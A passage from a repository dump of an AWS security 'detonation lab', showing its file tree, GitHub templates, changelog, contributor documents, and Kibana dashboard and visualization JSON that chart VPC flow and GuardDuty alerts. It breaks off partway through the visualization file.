├── .github
│   ├── ISSUE_TEMPLATE
│   │   ├── bug_report.md
│   │   └── feature_request.md
│   └── PULL_REQUEST_TEMPLATE.md
├── .gitignore
├── CHANGELOG.md
├── CODE_OF_CONDUCT.md
├── CONTRIBUTING.md
├── KibanaAdditionalConfigs
│   ├── Kibana-Dashboard.json
│   └── Kibana-Visualizations.json
├── LICENSE
├── README.md
├── SANs_ThreatHuntingSummit-Powerpoint
│   └── Storm-Troopers-ThreatHuntingInTheClouds.pdf
├── ThreatHuntingGuides
│   └── README.md
├── Wazuh-configurations
│   ├── runOnAWSCLIHost
│   │   └── awsCLI-wazuh-configuration-cloudTrail.sh
│   └── runOnWazuh
│       └── server-wazuh-configuration-cloudTrail.sh
├── additionalInstallationScripts
│   ├── bastion_bootstrap.sh
│   ├── cloudwatchAgentLogs.ps1
│   ├── cloudwatchAgentLogs.sh
│   ├── installWazuh.sh
│   ├── installWazuhAgent.ps1
│   ├── installWazuhAgent.sh
│   └── setupVunlerableWebServer.sh
├── artifacts
│   ├── banner_message.txt
│   ├── never_used_sample_key.foo
│   ├── password_list.txt
│   └── queries.txt
├── attacks
│   ├── README.md
│   └── guardduty_tester.sh
├── awsDetonationLab.template
└── images
    ├── RoyalTSX-Config
    │   ├── 1-RoyalTSX-requiredDocument.png
    │   ├── 2-RDP-connnectionSettings.png
    │   ├── 3-RDP-credentials.png
    │   ├── 4-RDP-secureGateway.png
    │   ├── 5-bastion- credential.png
    │   ├── 6-bastion-key.png
    │   ├── 7-secureGateway-config.png
    │   └── 8-secureGateway-credentials.png
    ├── Topology
    │   ├── Topology-All.png
    │   ├── Topology-IAM.png
    │   ├── Topology-Inspector.png
    │   ├── Topology-cloudTrail.png
    │   ├── Topology-guardduty.png
    │   ├── Topology-macie.png
    │   ├── Topology-vpcflow.png
    │   └── Topology-wazuh.png
    ├── detonationLab-created.png
    └── guardDutyFindings-example.png

/.github/ISSUE_TEMPLATE/bug_report.md:
--------------------------------------------------------------------------------
---
name: Bug report
about: Create a report to help us improve

---

**Describe the bug**
A clear and concise description of what the bug is.

**To Reproduce**
Steps to reproduce the behavior:
1. Go to '...'
2. Click on '....'
3. Scroll down to '....'
4. See error

**Expected behavior**
A clear and concise description of what you expected to happen.

**Screenshots**
If applicable, add screenshots to help explain your problem.

**Desktop (please complete the following information):**
 - OS: [e.g. iOS]
 - Browser [e.g. chrome, safari]
 - Version [e.g. 22]

**Smartphone (please complete the following information):**
 - Device: [e.g. iPhone6]
 - OS: [e.g. iOS8.1]
 - Browser [e.g. stock browser, safari]
 - Version [e.g. 22]

**Additional context**
Add any other context about the problem here.

--------------------------------------------------------------------------------
/.github/ISSUE_TEMPLATE/feature_request.md:
--------------------------------------------------------------------------------
---
name: Feature request
about: Suggest an idea for this project

---

**Is your feature request related to a problem? Please describe.**
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]

**Describe the solution you'd like**
A clear and concise description of what you want to happen.

**Describe alternatives you've considered**
A clear and concise description of any alternative solutions or features you've considered.

**Additional context**
Add any other context or screenshots about the feature request here.

--------------------------------------------------------------------------------
/.github/PULL_REQUEST_TEMPLATE.md:
--------------------------------------------------------------------------------
*Issue #, if available:*

*Description of changes:*


By submitting this pull request, I confirm that my contribution is made under the terms of the Apache 2.0 license.

--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
*$py.class

# C extensions
*.so

# Distribution / packaging
.Python
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
wheels/
share/python-wheels/
*.egg-info/
.installed.cfg
*.egg
MANIFEST

# PyInstaller
#  Usually these files are written by a python script from a template
#  before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec

# Installer logs
pip-log.txt
pip-delete-this-directory.txt

# Unit test / coverage reports
htmlcov/
.tox/
.nox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*.cover
*.py,cover
.hypothesis/
.pytest_cache/
cover/

# Translations
*.mo
*.pot

# Django stuff:
*.log
local_settings.py
db.sqlite3
db.sqlite3-journal

# Flask stuff:
instance/
.webassets-cache

# Scrapy stuff:
.scrapy

# Sphinx documentation
docs/_build/

# PyBuilder
.pybuilder/
target/

# Jupyter Notebook
.ipynb_checkpoints

# IPython
profile_default/
ipython_config.py

# pyenv
#   For a library or package, you might want to ignore these files since the code is
#   intended to run in multiple environments; otherwise, check them in:
#   .python-version

# pipenv
#   According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
#   However, in case of collaboration, if having platform-specific dependencies or dependencies
#   having no cross-platform support, pipenv may install dependencies that don't work, or not
#   install all needed dependencies.
#Pipfile.lock

# poetry
#   Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control.
#   This is especially recommended for binary packages to ensure reproducibility, and is more
#   commonly ignored for libraries.
#   https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control
#poetry.lock

# PEP 582; used by e.g. github.com/David-OConnor/pyflow
__pypackages__/

# Celery stuff
celerybeat-schedule
celerybeat.pid

# SageMath parsed files
*.sage.py

# Environments
.env
.venv
env/
venv/
ENV/
env.bak/
venv.bak/

# Spyder project settings
.spyderproject
.spyproject

# Rope project settings
.ropeproject

# mkdocs documentation
/site

# mypy
.mypy_cache/
.dmypy.json
dmypy.json

# Pyre type checker
.pyre/

# pytype static type analyzer
.pytype/

# Cython debug symbols
cython_debug/

# PyCharm
#  JetBrains specific template is maintained in a separate JetBrains.gitignore that can
#  be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore
#  and can be added to the global gitignore or merged into this file.  For a more nuclear
#  option (not recommended) you can uncomment the following to ignore the entire idea folder.
#.idea/

--------------------------------------------------------------------------------
/CHANGELOG.md:
--------------------------------------------------------------------------------
# Changelog

## v2.2
### Changed
* Inspector logs are fetched directly from the AWS API instead of being fetched from an S3 bucket.

## v2.1
### Added
* Automate setting `wazuh-alerts-3.x-*` as Kibana's default index pattern ([#64](https://github.com/sonofagl1tch/AWSDetonationLab/pull/64/)).
* Automate import of custom dashboards and visualizations into Kibana ([#68](https://github.com/sonofagl1tch/AWSDetonationLab/pull/68/)).

### Fixed
* Retrieve AMI IDs dynamically instead of having hardcoded values ([#66](https://github.com/sonofagl1tch/AWSDetonationLab/pull/66)).

## v2.0
### Added
* Added `apache` user to `wheel` group in Linux vulnerable server ([#20](https://github.com/sonofagl1tch/AWSDetonationLab/pull/20)).
* Added parameters in CF script to select instance type ([#27](https://github.com/sonofagl1tch/AWSDetonationLab/pull/27), [#31](https://github.com/sonofagl1tch/AWSDetonationLab/pull/31) and [#34](https://github.com/sonofagl1tch/AWSDetonationLab/pull/34)).
* Allow deploying multiple detonation labs in the same account by using randomly generated names ([#33](https://github.com/sonofagl1tch/AWSDetonationLab/pull/33)).
* Install Wazuh agent in both bastion and red team instances ([#47](https://github.com/sonofagl1tch/AWSDetonationLab/pull/47)).
* Add support for Wazuh's VirusTotal integration ([#58](https://github.com/sonofagl1tch/AWSDetonationLab/pull/58)).

### Fixed
* Additional Wazuh configuration is appended to the default one instead of rewriting all Wazuh configuration ([#26](https://github.com/sonofagl1tch/AWSDetonationLab/pull/26) and [#35](https://github.com/sonofagl1tch/AWSDetonationLab/pull/35)).
* Fixed typo in CF script: _firehost_ to _firehose_ ([#37](https://github.com/sonofagl1tch/AWSDetonationLab/pull/37)).
* Fixed bug replacing AWS secret key in Wazuh configuration ([#62](https://github.com/sonofagl1tch/AWSDetonationLab/pull/62)).

### Changed
* Wazuh agents are registered using the `authd` service ([#19](https://github.com/sonofagl1tch/AWSDetonationLab/pull/19) and [#39](https://github.com/sonofagl1tch/AWSDetonationLab/pull/39)).
* AMI images have been updated to `amzn-ami-hvm-2018.03.0.20181119-x86_64-gp2` and `Windows_Server-2012-R2_RTM-English-64Bit-Base-2018.10.14` ([#52](https://github.com/sonofagl1tch/AWSDetonationLab/pull/52)).
* Update Java download script ([#43](https://github.com/sonofagl1tch/AWSDetonationLab/pull/43)).
* Implemented new method of logging VPC Flow directly to S3 without a lambda function ([#21](https://github.com/sonofagl1tch/AWSDetonationLab/pull/21)).

### Removed
* Removed unnecessary open ports and security group settings for Wazuh agents ([#38](https://github.com/sonofagl1tch/AWSDetonationLab/pull/38)).
* Removed installation of Python Pip in the Wazuh manager ([#57](https://github.com/sonofagl1tch/AWSDetonationLab/pull/57)).

--------------------------------------------------------------------------------
/CODE_OF_CONDUCT.md:
--------------------------------------------------------------------------------
# Contributor Covenant Code of Conduct

## Our Pledge

In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation.

## Our Standards

Examples of behavior that contributes to creating a positive environment include:

* Using welcoming and inclusive language
* Being respectful of differing viewpoints and experiences
* Gracefully accepting constructive criticism
* Focusing on what is best for the community
* Showing empathy towards other community members

Examples of unacceptable behavior by participants include:

* The use of sexualized language or imagery and unwelcome sexual attention or advances
* Trolling, insulting/derogatory comments, and personal or political attacks
* Public or private harassment
* Publishing others' private information, such as a physical or electronic address, without explicit permission
* Other conduct which could reasonably be considered inappropriate in a professional setting

## Our Responsibilities

Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.

Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful.

## Scope

This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers.

## Enforcement

Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at nolette.ryan@gmail.com. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately.

Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.

## Attribution

This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, available at [http://contributor-covenant.org/version/1/4][version]

[homepage]: http://contributor-covenant.org
[version]: http://contributor-covenant.org/version/1/4/

--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
# Contributing Guidelines

Thank you for your interest in contributing to our project. Whether it's a bug report, new feature, correction, or additional
documentation, we greatly value feedback and contributions from our community.

Please read through this document before submitting any issues or pull requests to ensure we have all the necessary
information to effectively respond to your bug report or contribution.


## Reporting Bugs/Feature Requests

We welcome you to use the GitHub issue tracker to report bugs or suggest features.

When filing an issue, please check [existing open](https://github.com/awslabs/amazon-guardduty-tester/issues), or [recently closed](https://github.com/awslabs/amazon-guardduty-tester/issues?utf8=%E2%9C%93&q=is%3Aissue%20is%3Aclosed%20), issues to make sure somebody else hasn't already
reported the issue. Please try to include as much information as you can. Details like these are incredibly useful:

* A reproducible test case or series of steps
* The version of our code being used
* Any modifications you've made relevant to the bug
* Anything unusual about your environment or deployment


## Contributing via Pull Requests
Contributions via pull requests are much appreciated. Before sending us a pull request, please ensure that:

1. You are working against the latest source on the *master* branch.
2. You check existing open, and recently merged, pull requests to make sure someone else hasn't addressed the problem already.
3. You open an issue to discuss any significant work - we would hate for your time to be wasted.

To send us a pull request, please:

1. Fork the repository.
2. Modify the source; please focus on the specific change you are contributing. If you also reformat all the code, it will be hard for us to focus on your change.
3. Ensure local tests pass.
4. Commit to your fork using clear commit messages.
5. Send us a pull request, answering any default questions in the pull request interface.
6. Pay attention to any automated CI failures reported in the pull request, and stay involved in the conversation.

GitHub provides additional documentation on [forking a repository](https://help.github.com/articles/fork-a-repo/) and
[creating a pull request](https://help.github.com/articles/creating-a-pull-request/).


## Finding contributions to work on
Looking at the existing issues is a great way to find something to contribute on. As our projects, by default, use the default GitHub issue labels (enhancement/bug/duplicate/help wanted/invalid/question/wontfix), looking at any ['help wanted'](https://github.com/awslabs/amazon-guardduty-tester/labels/help%20wanted) issues is a great place to start.


## Code of Conduct
This project has adopted the [Amazon Open Source Code of Conduct](https://aws.github.io/code-of-conduct).
For more information see the [Code of Conduct FAQ](https://aws.github.io/code-of-conduct-faq) or contact
opensource-codeofconduct@amazon.com with any additional questions or comments.


## Security issue notifications
If you discover a potential security issue in this project we ask that you notify AWS/Amazon Security via our [vulnerability reporting page](http://aws.amazon.com/security/vulnerability-reporting/). Please do **not** create a public GitHub issue.


## Licensing

See the [LICENSE](https://github.com/awslabs/amazon-guardduty-tester/blob/master/LICENSE) file for our project's licensing. We will ask you to confirm the licensing of your contribution.

We may ask you to sign a [Contributor License Agreement (CLA)](http://en.wikipedia.org/wiki/Contributor_License_Agreement) for larger changes.
62 | -------------------------------------------------------------------------------- /KibanaAdditionalConfigs/Kibana-Dashboard.json: -------------------------------------------------------------------------------- 1 | { 2 | "objects": [ 3 | { 4 | "id": "6bec8300-a4b8-11e8-846b-5b38848342c8", 5 | "type": "dashboard", 6 | "attributes": { 7 | "title": "AWS-Logging", 8 | "hits": 0, 9 | "description": "", 10 | "panelsJSON": "[{\"panelIndex\":\"1\",\"gridData\":{\"x\":0,\"y\":0,\"w\":24,\"h\":15,\"i\":\"1\"},\"embeddableConfig\":{},\"id\":\"5ac185d0-a4b8-11e8-846b-5b38848342c8\",\"type\":\"visualization\",\"version\":\"6.3.2\"},{\"panelIndex\":\"2\",\"gridData\":{\"x\":24,\"y\":0,\"w\":24,\"h\":15,\"i\":\"2\"},\"embeddableConfig\":{},\"id\":\"864e9ef0-a4b7-11e8-846b-5b38848342c8\",\"type\":\"visualization\",\"version\":\"6.3.2\"},{\"panelIndex\":\"3\",\"gridData\":{\"x\":0,\"y\":15,\"w\":24,\"h\":15,\"i\":\"3\"},\"embeddableConfig\":{},\"id\":\"804781a0-a540-11e8-846b-5b38848342c8\",\"type\":\"visualization\",\"version\":\"6.3.2\"},{\"panelIndex\":\"4\",\"gridData\":{\"x\":24,\"y\":15,\"w\":24,\"h\":15,\"i\":\"4\"},\"embeddableConfig\":{},\"id\":\"23862010-a541-11e8-846b-5b38848342c8\",\"type\":\"visualization\",\"version\":\"6.3.2\"},{\"panelIndex\":\"5\",\"gridData\":{\"x\":0,\"y\":30,\"w\":24,\"h\":15,\"i\":\"5\"},\"embeddableConfig\":{},\"id\":\"cb77bf40-a541-11e8-846b-5b38848342c8\",\"type\":\"visualization\",\"version\":\"6.3.2\"},{\"panelIndex\":\"6\",\"gridData\":{\"x\":24,\"y\":30,\"w\":24,\"h\":15,\"i\":\"6\"},\"embeddableConfig\":{},\"id\":\"3dd5d000-a541-11e8-846b-5b38848342c8\",\"type\":\"visualization\",\"version\":\"6.3.2\"},{\"panelIndex\":\"7\",\"gridData\":{\"x\":0,\"y\":45,\"w\":24,\"h\":15,\"i\":\"7\"},\"embeddableConfig\":{},\"id\":\"b4f2abe0-a541-11e8-846b-5b38848342c8\",\"type\":\"visualization\",\"version\":\"6.3.2\"},{\"panelIndex\":\"8\",\"gridData\":{\"x\":24,\"y\":60,\"w\":24,\"h\":15,\"i\":\"8\"},\"embeddableConfig\":{},\"id\":\"cf4ecc00-a54e
-11e8-846b-5b38848342c8\",\"type\":\"visualization\",\"version\":\"6.3.2\"},{\"panelIndex\":\"9\",\"gridData\":{\"x\":24,\"y\":45,\"w\":24,\"h\":15,\"i\":\"9\"},\"embeddableConfig\":{},\"id\":\"47bf70b0-a552-11e8-846b-5b38848342c8\",\"type\":\"visualization\",\"version\":\"6.3.2\"},{\"panelIndex\":\"10\",\"gridData\":{\"x\":24,\"y\":75,\"w\":24,\"h\":15,\"i\":\"10\"},\"embeddableConfig\":{},\"id\":\"20b982d0-a552-11e8-846b-5b38848342c8\",\"type\":\"visualization\",\"version\":\"6.3.2\"},{\"panelIndex\":\"11\",\"gridData\":{\"x\":0,\"y\":75,\"w\":24,\"h\":15,\"i\":\"11\"},\"embeddableConfig\":{},\"id\":\"b4666910-a54f-11e8-846b-5b38848342c8\",\"type\":\"visualization\",\"version\":\"6.3.2\"},{\"panelIndex\":\"12\",\"gridData\":{\"x\":24,\"y\":90,\"w\":24,\"h\":15,\"i\":\"12\"},\"embeddableConfig\":{},\"id\":\"70762330-a54f-11e8-846b-5b38848342c8\",\"type\":\"visualization\",\"version\":\"6.3.2\"},{\"panelIndex\":\"13\",\"gridData\":{\"x\":0,\"y\":90,\"w\":24,\"h\":15,\"i\":\"13\"},\"embeddableConfig\":{},\"id\":\"1298fbf0-a551-11e8-846b-5b38848342c8\",\"type\":\"visualization\",\"version\":\"6.3.2\"},{\"panelIndex\":\"14\",\"gridData\":{\"x\":0,\"y\":60,\"w\":24,\"h\":15,\"i\":\"14\"},\"version\":\"6.3.2\",\"type\":\"visualization\",\"id\":\"39aabda0-a6e6-11e8-89d6-8101ba40c8df\",\"embeddableConfig\":{}},{\"panelIndex\":\"15\",\"gridData\":{\"x\":0,\"y\":105,\"w\":24,\"h\":15,\"i\":\"15\"},\"version\":\"6.3.2\",\"type\":\"visualization\",\"id\":\"90d5fd80-a6fd-11e8-89d6-8101ba40c8df\",\"embeddableConfig\":{}}]", 11 | "optionsJSON": "{\"darkTheme\":false,\"hidePanelTitles\":false,\"useMargins\":true}", 12 | "version": 1, 13 | "timeRestore": false, 14 | "kibanaSavedObjectMeta": { 15 | "searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"filter\":[],\"highlightAll\":true,\"version\":true}" 16 | } 17 | } 18 | } 19 | ] 20 | } -------------------------------------------------------------------------------- 
/KibanaAdditionalConfigs/Kibana-Visualizations.json: -------------------------------------------------------------------------------- 1 | { 2 | "objects": 3 | [ 4 | { 5 | "id": "23862010-a541-11e8-846b-5b38848342c8", 6 | "type": "visualization", 7 | "attributes": { 8 | "title": "VPCFlow-Top10ExternalDestinationIP-Table", 9 | "visState": "{\"title\":\"VPCFlow-Top10ExternalDestinationIP-Table\",\"type\":\"table\",\"params\":{\"perPage\":10,\"showPartialRows\":false,\"showMeticsAtAllLevels\":false,\"sort\":{\"columnIndex\":null,\"direction\":null},\"showTotal\":false,\"totalFunc\":\"sum\"},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Count\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"bucket\",\"params\":{\"field\":\"data.aws.dstaddr\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":10,\"order\":\"desc\",\"orderBy\":\"1\",\"customLabel\":\"Top 10 External Destination IP\"}}]}", 10 | "uiStateJSON": "{\"vis\":{\"params\":{\"sort\":{\"columnIndex\":null,\"direction\":null}}}}", 11 | "description": "", 12 | "version": 1, 13 | "kibanaSavedObjectMeta": { 14 | "searchSourceJSON": "{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"query\":\"-data.aws.dstaddr: \\\"10.0.0.0/4\\\" AND -data.aws.dstaddr: \\\"172.16.0.0/12\\\" AND -data.aws.dstaddr: \\\"192.168.0.0/16\\\"\",\"language\":\"lucene\"}}" 15 | } 16 | } 17 | }, 18 | { 19 | "id": "39aabda0-a6e6-11e8-89d6-8101ba40c8df", 20 | "type": "visualization", 21 | "attributes": { 22 | "title": "VPCFlow-Top10TransferSizesForExternalDestinationIP-Table", 23 | "visState": 
"{\"title\":\"VPCFlow-Top10TransferSizesForExternalDestinationIP-Table\",\"type\":\"table\",\"params\":{\"perPage\":10,\"showPartialRows\":false,\"showMeticsAtAllLevels\":false,\"sort\":{\"columnIndex\":1,\"direction\":\"desc\"},\"showTotal\":false,\"totalFunc\":\"sum\"},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"top_hits\",\"schema\":\"metric\",\"params\":{\"field\":\"data.aws.bytes\",\"aggregate\":\"max\",\"size\":10,\"sortField\":\"@timestamp\",\"sortOrder\":\"desc\",\"customLabel\":\"Bytes Sent\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"bucket\",\"params\":{\"field\":\"data.aws.dstaddr\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":10,\"order\":\"desc\",\"orderBy\":\"_term\",\"customLabel\":\"Destination IP\"}}]}", 24 | "uiStateJSON": "{\"vis\":{\"params\":{\"sort\":{\"columnIndex\":1,\"direction\":\"desc\"}}}}", 25 | "description": "", 26 | "version": 1, 27 | "kibanaSavedObjectMeta": { 28 | "searchSourceJSON": "{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"query\":\"data.aws.source:vpc AND NOT data.aws.dstaddr:\\\"10.0.0.0/4\\\" AND NOT data.aws.dstaddr:\\\"172.16.0.0/12\\\" AND NOT data.aws.dstaddr:\\\"192.168.0.0/16\\\"\",\"language\":\"kuery\"}}" 29 | } 30 | } 31 | }, 32 | { 33 | "id": "3dd5d000-a541-11e8-846b-5b38848342c8", 34 | "type": "visualization", 35 | "attributes": { 36 | "title": "VPCFlow-Top10InternalDestinationIP-Table", 37 | "visState": 
"{\"title\":\"VPCFlow-Top10InternalDestinationIP-Table\",\"type\":\"table\",\"params\":{\"perPage\":10,\"showPartialRows\":false,\"showMeticsAtAllLevels\":false,\"sort\":{\"columnIndex\":null,\"direction\":null},\"showTotal\":false,\"totalFunc\":\"sum\"},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Count\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"bucket\",\"params\":{\"field\":\"data.aws.dstaddr\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":10,\"order\":\"desc\",\"orderBy\":\"1\",\"customLabel\":\"Top 10 Interal Destination IP\"}}]}", 38 | "uiStateJSON": "{\"vis\":{\"params\":{\"sort\":{\"columnIndex\":null,\"direction\":null}}}}", 39 | "description": "", 40 | "version": 1, 41 | "kibanaSavedObjectMeta": { 42 | "searchSourceJSON": "{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"query\":\"data.aws.dstaddr: \\\"10.0.0.0/4\\\" OR data.aws.dstaddr: \\\"172.16.0.0/12\\\" OR data.aws.dstaddr: \\\"192.168.0.0/16\\\"\",\"language\":\"lucene\"}}" 43 | } 44 | } 45 | }, 46 | { 47 | "id": "20b982d0-a552-11e8-846b-5b38848342c8", 48 | "type": "visualization", 49 | "attributes": { 50 | "title": "VPCFlow-ProtocolBreakdown-Pie", 51 | "visState": 
"{\"title\":\"VPCFlow-ProtocolBreakdown-Pie\",\"type\":\"pie\",\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":false,\"labels\":{\"show\":true,\"values\":true,\"last_level\":true,\"truncate\":100}},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Count\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"data.aws.protocol\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":20,\"order\":\"desc\",\"orderBy\":\"1\",\"customLabel\":\"VPCFlow Protocols\"}}]}", 52 | "uiStateJSON": "{}", 53 | "description": "", 54 | "version": 1, 55 | "kibanaSavedObjectMeta": { 56 | "searchSourceJSON": "{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"query\":\"data.aws.source : \\\"vpc\\\"\",\"language\":\"kuery\"}}" 57 | } 58 | } 59 | }, 60 | { 61 | "id": "5ac185d0-a4b8-11e8-846b-5b38848342c8", 62 | "type": "visualization", 63 | "attributes": { 64 | "title": "AWS-LoggingSources", 65 | "visState": "{\"title\":\"AWS-LoggingSources\",\"type\":\"pie\",\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100}},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Count\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"data.aws.source\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":5,\"order\":\"desc\",\"orderBy\":\"1\",\"customLabel\":\"AWSLoggingSources\"}}]}", 66 | "uiStateJSON": "{}", 67 | "description": "", 68 | "version": 1, 69 | "kibanaSavedObjectMeta": { 70 | "searchSourceJSON": 
"{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"query\":\"\",\"language\":\"lucene\"}}" 71 | } 72 | } 73 | }, 74 | { 75 | "id": "1298fbf0-a551-11e8-846b-5b38848342c8", 76 | "type": "visualization", 77 | "attributes": { 78 | "title": "GuardDuty-BreakdownOfAlertsPerInstancePerVPC-Pie", 79 | "visState": "{\"title\":\"GuardDuty-BreakdownOfAlertsPerInstancePerVPC-Pie\",\"type\":\"pie\",\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":false,\"labels\":{\"show\":true,\"values\":true,\"last_level\":true,\"truncate\":100}},\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Count of Instances In VPC\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"split\",\"params\":{\"field\":\"data.aws.resource.instanceDetails.networkInterfaces.vpcId\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":100,\"order\":\"desc\",\"orderBy\":\"1\",\"customLabel\":\"VPCID\",\"row\":true}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"data.aws.resource.instanceDetails.instanceId\",\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"size\":100,\"order\":\"desc\",\"orderBy\":\"1\",\"customLabel\":\"InstanceID\"}}]}", 80 | "uiStateJSON": "{}", 81 | "description": "", 82 | "version": 1, 83 | "kibanaSavedObjectMeta": { 84 | "searchSourceJSON": "{\"index\":\"wazuh-alerts-3.x-*\",\"filter\":[],\"query\":{\"query\":\"data.aws.source:guardduty\",\"language\":\"kuery\"}}" 85 | } 86 | } 87 | }, 88 | { 89 | "id": "804781a0-a540-11e8-846b-5b38848342c8", 90 | "type": "visualization", 91 | "attributes": { 92 | "title": "VPCFlow-SumOfBytesOverTime-histogram", 93 | "visState": 
"{\"aggs\":[{\"enabled\":true,\"id\":\"1\",\"params\":{\"customBucket\":{\"enabled\":true,\"id\":\"1-bucket\",\"params\":{\"customInterval\":\"2h\",\"extended_bounds\":{},\"field\":\"@timestamp\",\"interval\":\"d\",\"min_doc_count\":1},\"schema\":{\"aggFilter\":[],\"deprecate\":false,\"editor\":false,\"group\":\"none\",\"max\":null,\"min\":0,\"name\":\"bucketAgg\",\"params\":[],\"title\":\"Bucket Agg\"},\"type\":\"date_histogram\"},\"customMetric\":{\"enabled\":true,\"id\":\"1-metric\",\"params\":{\"customLabel\":\"Bytes\",\"field\":\"data.aws.bytes\"},\"schema\":{\"aggFilter\":[\"!top_hits\",\"!percentiles\",\"!percentile_ranks\",\"!median\",\"!std_dev\",\"!sum_bucket\",\"!avg_bucket\",\"!min_bucket\",\"!max_bucket\",\"!derivative\",\"!moving_avg\",\"!serial_diff\",\"!cumulative_sum\"],\"deprecate\":false,\"editor\":false,\"group\":\"none\",\"max\":null,\"min\":0,\"name\":\"metricAgg\",\"params\":[],\"title\":\"Metric Agg\"},\"type\":\"sum\"}},\"schema\":\"metric\",\"type\":\"sum_bucket\"},{\"enabled\":true,\"id\":\"2\",\"params\":{\"customInterval\":\"2h\",\"extended_bounds\":{},\"field\":\"@timestamp\",\"interval\":\"auto\",\"min_doc_count\":1},\"schema\":\"segment\",\"type\":\"date_histogram\"}],\"params\":{\"addLegend\":true,\"addTimeMarker\":false,\"addTooltip\":false,\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"labels\":{\"show\":true,\"truncate\":100},\"position\":\"bottom\",\"scale\":{\"type\":\"linear\"},\"show\":true,\"style\":{},\"title\":{},\"type\":\"category\"}],\"grid\":{\"categoryLines\":false,\"style\":{\"color\":\"#eee\"}},\"legendPosition\":\"right\",\"seriesParams\":[{\"data\":{\"id\":\"1\",\"label\":\"Overall Sum of 
